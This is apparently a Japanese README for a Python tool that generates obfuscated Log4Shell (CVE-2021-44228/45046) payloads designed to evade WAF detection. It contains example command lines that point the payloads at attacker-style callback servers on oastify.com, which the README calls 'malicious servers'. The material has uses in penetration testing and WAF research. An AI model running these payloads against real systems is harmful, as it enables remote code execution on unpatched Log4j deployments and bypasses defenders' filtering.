
WAF検知を回避するために、一次難読化または二次難読化されたCVE-2021-44228またはCVE-2021-45046ペイロードを生成します。
Log4Shell-obfuscated-payloads-generator は、WAF 検出を回避するために、一次難読化または二次難読化された CVE-2021-44228 または CVE-2021-45046 ペイロードを生成できます。
Log4Shell-obfuscated-payloads-generator の設計思想
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
Log4Shell-obfuscated-payloads-generator は、Python 3.x が動作する環境であれば、どのプラットフォームでも追加設定なしですぐに動作します。
基本オプションの一覧を取得するには:
python3 Log4Shell-obfuscated-payloads-generator.py -h
使用例を取得するには:
python3 Log4Shell-obfuscated-payloads-generator.py -hh
-h: 基本オプションの一覧を取得

-hh: 使用例を取得

単一のオプションでペイロードを生成する場合、-s オプションで悪意のあるサーバーを指定します:
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

複数のオプションでペイロードを生成する場合、-s オプションで悪意のあるサーバーを指定します:
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

-s オプションで悪意のあるサーバーを指定しない場合、生成されたペイロードには {{callback_host}} プレースホルダーが保持されます:
--generate-primary-obfuscated-cve-2021-44228-payload 3

--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
